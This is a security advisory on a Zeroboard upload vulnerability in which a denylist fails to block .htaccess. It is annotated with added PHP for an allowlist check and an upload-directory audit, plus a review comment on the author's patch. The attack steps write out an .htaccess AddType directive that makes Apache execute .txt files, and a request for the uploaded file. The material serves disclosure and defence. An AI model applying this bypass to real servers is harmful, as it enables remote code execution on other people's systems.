Zeroboard File Upload & extension bypass Vulnerability

Author : Choi Min-sung (mins __at__ wins21.com)
Product : Zeroboard http://www.nzeo.com
Vendor-Patches : Unpatched
Impact : remote code execution


Summary
=======

Zeroboard refuses uploads of PHP, HTML and CGI files, but it does not treat uploads of other files that can change the Apache configuration, such as .htaccess, as a serious issue. A remote attacker can therefore execute arbitrary code on the web server and take control of the system.


Affected Products
=================

* Apache installations whose httpd.conf sets AllowOverride FileInfo (or AllowOverride All) for the Zeroboard data directory, so that a .htaccess file placed there can change how files are handled.
* Zeroboard 4.1pl8 or earlier


Details
=======

Zeroboard blocks uploads of executable scripts such as php, html, cgi and asp by matching the file name against a denylist of extensions.

write_ok.php
------------
// Upload prohibited
if($file1_size>0) {
    $s_file_name1=$file1_name;
    // Denylist: reject any name containing one of these extensions
    if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)
       ||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)
       ||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML and PHP related files cannot be uploaded.");

The code above cannot block the upload of files such as .htaccess, whose names contain none of the listed extensions.


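As an added example (not Zeroboard's code and not part of the advisory), here is an allowlist-based replacement for the denylist in write_ok.php, run side by side with a reproduction of the original denylist so the difference on names such as .htaccess is visible. The function names, the allowed-extension list and the sample file names are assumptions; the denylist reproduction only mirrors the extensions quoted above.

```php
<?php
// Added example, not Zeroboard's own code. Function names, the allowlist
// contents and the sample file names are assumptions made for this demo.

// Extensions an attachment may carry. Anything else is rejected.
const UPLOAD_ALLOWED_EXT = ['jpg', 'jpeg', 'gif', 'png', 'zip', 'txt', 'pdf'];

/**
 * Returns true only when $name is safe to store in the attachment directory:
 *  - no path separators or NUL bytes
 *  - must not start with a dot (rejects .htaccess, .htpasswd, .user.ini ...)
 *  - exactly one extension, and it must be in the allowlist
 */
function upload_name_is_allowed(string $name): bool
{
    if ($name === '' || strlen($name) > 255) {
        return false;
    }
    if (strpbrk($name, "/\\\0") !== false) {
        return false;
    }
    if ($name[0] === '.') {
        return false;            // dotfiles are never a legitimate attachment
    }
    $parts = explode('.', $name);
    // "test.txt" -> 2 parts; "shell.php.txt" -> 3 parts, so double
    // extensions are rejected as well
    if (count($parts) !== 2 || $parts[0] === '') {
        return false;
    }
    return in_array(strtolower($parts[1]), UPLOAD_ALLOWED_EXT, true);
}

/**
 * Zeroboard's original denylist from write_ok.php, reproduced as one
 * case-insensitive substring match for comparison.
 */
function zeroboard_denylist_blocks(string $name): bool
{
    return (bool) preg_match('/\.(inc|phtm|htm|shtm|ztx|php|dot|asp|cgi|pl)/i', $name);
}

// Constructed sample names
$samples = ['photo.jpg', 'shell.php', '.htaccess', 'shell.php.txt', 'notes.txt'];
foreach ($samples as $n) {
    printf("%-15s denylist blocks: %-4s allowlist accepts: %s\n",
        $n,
        zeroboard_denylist_blocks($n) ? 'yes' : 'no',
        upload_name_is_allowed($n) ? 'yes' : 'no');
}
```

Note that .txt stays accepted by the allowlist, exactly as in Zeroboard; what stops the scenario in this advisory is that the .htaccess upload is refused. The allowlist is a second line of defence only, so the data directory should still be served with AllowOverride None so that no uploaded file can change Apache's handlers in the first place.
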
The Process of an Actual Attack
===============================
- Attack Scenario

1. A malicious user uploads the following '.htaccess' file.

.htaccess
---------
AddType application/x-httpd-php .php .php3 .php4 .htm .html .txt

2. A malicious user uploads the following .txt file.

test.txt
--------


3. The PHP script is executed, because the .htaccess file makes Apache treat the .txt file as a PHP script.

$ lynx --dump http://hackme/zb41pl7/bbs/data/test/test.txt


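The three steps above leave two artefacts in Zeroboard's data directory: a dotfile containing a handler directive, and a file with a harmless extension whose body begins with a PHP tag. The following audit script, added here and not part of the advisory or of Zeroboard, walks an attachment directory and reports both. The directory layout, the directive list and the sample files it creates are constructed for the demonstration.

```php
<?php
// Added example, not from the advisory or Zeroboard. The sample tree it
// builds, the directive list and the function name are assumptions.

// Directives that change how Apache serves or executes a file. Their
// presence in an uploaded .htaccess is the indicator for this attack.
const HANDLER_DIRECTIVES =
    '/^\s*(AddType|AddHandler|SetHandler|php_value|php_flag|php_admin_value|RemoveHandler)\b/im';

/**
 * Walk $dir recursively and return findings as
 * [ ['path' => ..., 'reason' => ...], ... ]
 */
function audit_upload_dir(string $dir): array
{
    $findings = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        /** @var SplFileInfo $file */
        if (!$file->isFile()) {
            continue;
        }
        $name = $file->getFilename();
        $path = $file->getPathname();

        // Any dotfile is suspicious; a .htaccess with a handler directive is the smoking gun
        if ($name[0] === '.') {
            $reason = 'dotfile in attachment directory';
            if ($name === '.htaccess') {
                $content = (string) file_get_contents($path);
                if (preg_match(HANDLER_DIRECTIVES, $content, $m)) {
                    $reason = '.htaccess sets a handler directive (' . $m[1] . ')';
                }
            }
            $findings[] = ['path' => $path, 'reason' => $reason];
            continue;
        }

        // A "harmless" extension whose first bytes are a PHP open tag
        $head = (string) file_get_contents($path, false, null, 0, 64);
        if (stripos($head, '<?php') !== false || strpos($head, '<?=') !== false) {
            $findings[] = ['path' => $path, 'reason' => 'non-script extension with PHP open tag'];
        }
    }
    return $findings;
}

// Constructed sample tree in a temporary directory
$root = sys_get_temp_dir() . '/zb_audit_' . getmypid();
mkdir("$root/test", 0700, true);
file_put_contents("$root/test/.htaccess", "AddType application/x-httpd-php .txt\n");
file_put_contents("$root/test/test.txt", "<?php echo 'constructed sample'; ?>\n");
file_put_contents("$root/test/photo.jpg", "\xFF\xD8\xFF constructed, not a real jpeg\n");

foreach (audit_upload_dir($root) as $f) {
    echo $f['path'], ': ', $f['reason'], "\n";
}

// Remove the constructed sample tree
foreach (['.htaccess', 'test.txt', 'photo.jpg'] as $n) {
    unlink("$root/test/$n");
}
rmdir("$root/test");
rmdir($root);
```

Run against a real installation, point $root at Zeroboard's bbs/data directory instead; the photo.jpg sample is there to show that ordinary attachments produce no finding.
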
Solution
========

Below is an informal patch that I made.
Vendor status -> Unpatched

write_ok.php.patch
------------------
--- write_ok.php.org 2005-09-01 19:22:17.000000000 +0900 =0D
+++ write_ok.php 2005-09-01 19:22:27.000000000 +0900 =0D
@@ -208,7 +208,7 @@ =0D
=0D
// Upload prohibited =0D
if($file1_size>0) { =0D
$s_file_name1=$file1_name; =0D
- if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)=0D
=0D
||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)=0D
=0D
||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML and PHP related files cannot be uploaded."); =0D
=0D
+ if(preg_match("/^\./",$s_file_name1)||eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi=0D
=0D
("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi=0D
=0D
("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The =0D
=0D
HTML and PHP related files cannot be uploaded."); =0D
=0D
//Check extension =0D
if($setup[pds_ext1]) { =0D
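Review bot: the new `preg_match("/^\./",$s_file_name1)` at the front of the `+` line rejects names beginning with a dot and so stops the `.htaccess` upload, but the rest of the line keeps the same substring denylist, so the check is still a list of known-bad names rather than a list of permitted extensions, and `.txt` attachments remain accepted. Suggest collapsing the chain into a single allowlist test, e.g. `if(!preg_match('/^[^.]+\.(jpg|gif|png|zip|txt)$/i',$s_file_name1)) Error(...)`, and stating in the patch description that the data directory should additionally be served with AllowOverride None, since the Affected Products section already ties the issue to that setting. Mixing `preg_match` and `eregi` on one line also hurts readability; one function family for the whole condition would be clearer.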


Timeline
========
01/09/2005 Initial vendor notification; I made a temporary patch.
02/09/2005 Vendor confirms vulnerability.
15/03/2006 Vendor releases patch 4.1pl8 (this vulnerability is NOT fixed).
12/06/2006 Vulnerability reported to KISA (Korea Information Security Agency) KrCERT.
12/06/2006 Final vendor contact.
12/06/2006 Secunia notified of this vulnerability.
16/06/2006 Public disclosure.

Credits
=======
Discovered by Choi Min-sung, WINSTechnet CERT


Reference Site
==============
http://securecast.wins21.com/zerovul.html
http://securecast.wins21.com/offer/offer_database_view.asp?code=WE06-0391
